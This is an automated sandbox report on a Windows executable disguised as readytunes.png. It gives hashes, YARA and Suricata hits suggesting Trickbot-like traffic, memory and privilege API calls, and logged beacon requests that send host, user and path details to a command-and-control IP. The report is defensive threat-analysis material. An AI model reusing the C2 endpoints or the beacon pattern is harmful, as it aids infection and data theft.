popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

readytunes.png

Malicious Library OS Processor Check PE32 PE File
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6402 Sept. 10, 2021, 5:17 p.m. Sept. 10, 2021, 5:19 p.m.
Size 1.8MB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 40932e7f31ad53c47c03592a1de47151
SHA256 1afbb671cb511d867e5def880d34883ec05470d934d06bbb0ea074a98f196e5d
CRC32 525B8A26
ssdeep 49152:SVB3Xujk16sb2FX6CzYQsWGAMA3YbGMctIBR:SzXuQ16sb2FX6RnWGJAyGMca
PDB Path c:\startProper\carSell\Miletemperature\WereMajortime.pdb
Yara
  • PE_Header_Zero - PE File Signature
  • OS_Processor_Check_Zero - OS Processor Check
  • Malicious_Library_Zero - Malicious_Library
  • IsPE32 - (no description)

Name Response Post-Analysis Lookup
wtfismyip.com
A 51.79.249.161
51.79.249.161
IP Address Status Action
105.27.205.34 Active Moloch
164.124.101.2 Active Moloch
185.56.175.122 Active Moloch
46.99.175.149 Active Moloch
51.79.249.161 Active Moloch
65.152.201.203 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.102:49168 -> 185.56.175.122:443 2028401 ET JA3 Hash - Possible Malware - Various Trickbot/Kovter/Dridex Unknown Traffic
TCP 192.168.56.102:49169 -> 51.79.249.161:80 2019737 ET POLICY IP Check wtfismyip.com Potential Corporate Privacy Violation
TCP 185.56.175.122:443 -> 192.168.56.102:49168 2011540 ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O) Not Suspicious Traffic
TCP 192.168.56.102:49169 -> 51.79.249.161:80 2013028 ET POLICY curl User-Agent Outbound Attempted Information Leak

Suricata TLS

Flow Issuer Subject Fingerprint
TLSv1
192.168.56.102:49168
185.56.175.122:443 		C=AU, ST=Some-State, O=Internet Widgits Pty Ltd C=AU, ST=Some-State, O=Internet Widgits Pty Ltd 50:fd:fd:4e:2c:57:ea:f7:c9:cd:3f:61:4a:a2:40:01:1b:b8:df:02

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
pdb_path c:\startProper\carSell\Miletemperature\WereMajortime.pdb
Time & API Arguments Status Return Repeated

__exception__

 stacktrace: 
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x77919a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x7724b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x74e705bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74e86d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77951278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x77919a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x7724b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x74e705bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74e86d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77951278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x77919a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x7724b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x74e705bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74e86d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77951278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x77919a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x7724b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x74e705bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74e86d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77951278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x77919a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x7724b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x74e705bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74e86d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77951278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x77919a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x7724b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x74e705bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74e86d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77951278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x77919a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x7724b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x74e705bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74e86d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77951278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x77919a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x7724b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x74e705bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74e86d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77951278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x77919a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x7724b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x74e705bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74e86d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77951278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x77919a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x7724b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x74e705bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74e86d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77951278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x77919a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x7724b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x74e705bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74e86d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77951278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x77919a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x7724b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x74e705bd
hook_in_monitor+0x45 lde-0x133 @ 0x74e642ea
New_ntdll_LdrGetProcedureAddress+0x43 New_ntdll_LdrLoadDll-0x156 @ 0x74e7f7f3
GetProcAddress+0x60 GetModuleHandleA-0x80 kernelbase+0x4190 @ 0x7fefde34190
SvchostPushServiceGlobals+0x471 WinHttpQueryOption-0x1a7b winhttp+0x1eb99 @ 0x7fef89aeb99
SvchostPushServiceGlobals+0x4fb WinHttpQueryOption-0x19f1 winhttp+0x1ec23 @ 0x7fef89aec23
WinHttpConnect+0x1ab WinHttpGetDefaultProxyConfiguration-0x1615 winhttp+0x13fe7 @ 0x7fef89a3fe7

exception.instruction_r: 48 8b 01 4a 89 44 c6 78 4d 85 e4 74 08 4b 89 8c
exception.symbol: RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a
exception.instruction: mov rax, qword ptr [rcx]
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 105050
exception.address: 0x77919a5a
registers.r14: 1998727936
registers.r15: 5594578
registers.rcx: 0
registers.rsi: 852308560
registers.r10: 0
registers.rbx: 0
registers.rsp: 714848
registers.r11: 0
registers.r8: 5
registers.r9: 1961940992
registers.rdx: 2
registers.r12: 3001376
registers.rbp: 0
registers.rdi: 0
registers.rax: 1
registers.r13: 443
1 0 0
suspicious_features Connection to IP address suspicious_request GET https://185.56.175.122/rob130/TEST22-PC_W617601.F23B783DDF38DBB86097125BBF17EB14/5/file/
suspicious_features Connection to IP address suspicious_request GET https://185.56.175.122/rob130/TEST22-PC_W617601.F23B783DDF38DBB86097125BBF17EB14/0/Windows%207%20x64%20SP1/1107/175.208.134.150/727F639DF1E9560A2743CB69221BB85D3D1D1CBDEE638318DB0A9F2C35331CAD/3r3r57PfZRZnF5NBVnVbZZp15X9911N/
suspicious_features Connection to IP address suspicious_request GET https://185.56.175.122/rob130/TEST22-PC_W617601.F23B783DDF38DBB86097125BBF17EB14/14/exc/E:%200xc0000005%20A:%200x0000000077919A5A/0/
suspicious_features Connection to IP address suspicious_request GET https://185.56.175.122/rob130/TEST22-PC_W617601.F23B783DDF38DBB86097125BBF17EB14/14/user/test22/0/
suspicious_features Connection to IP address suspicious_request GET https://185.56.175.122/rob130/TEST22-PC_W617601.F23B783DDF38DBB86097125BBF17EB14/14/path/C:%5CUsers%5Ctest22%5CAppData%5CRoaming%5CAnyLiteGamesYX5S%5Creadytunes.exe/0/
suspicious_features Connection to IP address suspicious_request GET https://185.56.175.122/rob130/TEST22-PC_W617601.F23B783DDF38DBB86097125BBF17EB14/14/NAT%20status/client%20is%20behind%20NAT/0/
request GET http://wtfismyip.com/text
request GET https://185.56.175.122/rob130/TEST22-PC_W617601.F23B783DDF38DBB86097125BBF17EB14/5/file/
request GET https://185.56.175.122/rob130/TEST22-PC_W617601.F23B783DDF38DBB86097125BBF17EB14/0/Windows%207%20x64%20SP1/1107/175.208.134.150/727F639DF1E9560A2743CB69221BB85D3D1D1CBDEE638318DB0A9F2C35331CAD/3r3r57PfZRZnF5NBVnVbZZp15X9911N/
request GET https://185.56.175.122/rob130/TEST22-PC_W617601.F23B783DDF38DBB86097125BBF17EB14/14/exc/E:%200xc0000005%20A:%200x0000000077919A5A/0/
request GET https://185.56.175.122/rob130/TEST22-PC_W617601.F23B783DDF38DBB86097125BBF17EB14/14/user/test22/0/
request GET https://185.56.175.122/rob130/TEST22-PC_W617601.F23B783DDF38DBB86097125BBF17EB14/14/path/C:%5CUsers%5Ctest22%5CAppData%5CRoaming%5CAnyLiteGamesYX5S%5Creadytunes.exe/0/
request GET https://185.56.175.122/rob130/TEST22-PC_W617601.F23B783DDF38DBB86097125BBF17EB14/14/NAT%20status/client%20is%20behind%20NAT/0/
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 2528
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 16384
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x005b3000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2528
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00790000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2528
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x025f0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2528
region_size: 655360
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02600000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2528
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 245760
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00401000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2528
region_size: 16384
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x025f0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2528
region_size: 12288
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x10000000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2528
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x10001000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2528
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02600000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2528
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02610000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2528
region_size: 176128
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02620000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2452
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000490000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0
domain wtfismyip.com
cmdline C:\Windows\system32\cmd.exe
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

 flags: 15
family: 0
111 0
section {u'size_of_data': u'0x00104400', u'virtual_address': u'0x00001000', u'entropy': 6.8715395103566514, u'name': u'.text', u'virtual_size': u'0x00104381'} entropy 6.87153951036 description A section with a high entropy has been found
section {u'size_of_data': u'0x00020c00', u'virtual_address': u'0x0018f000', u'entropy': 6.880546465331147, u'name': u'.data', u'virtual_size': u'0x0011006c'} entropy 6.88054646533 description A section with a high entropy has been found
entropy 0.637996733805 description Overall entropy of this PE file is high
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
Time & API Arguments Status Return Repeated

NtTerminateProcess

 status_code: 0x00000000
process_identifier: 1776
process_handle: 0x000000f4
0 0

NtTerminateProcess

 status_code: 0x00000000
process_identifier: 1776
process_handle: 0x000000f4
1 0 0
host 105.27.205.34
host 185.56.175.122
host 46.99.175.149
host 65.152.201.203
dead_host 46.99.175.149:443
dead_host 65.152.201.203:443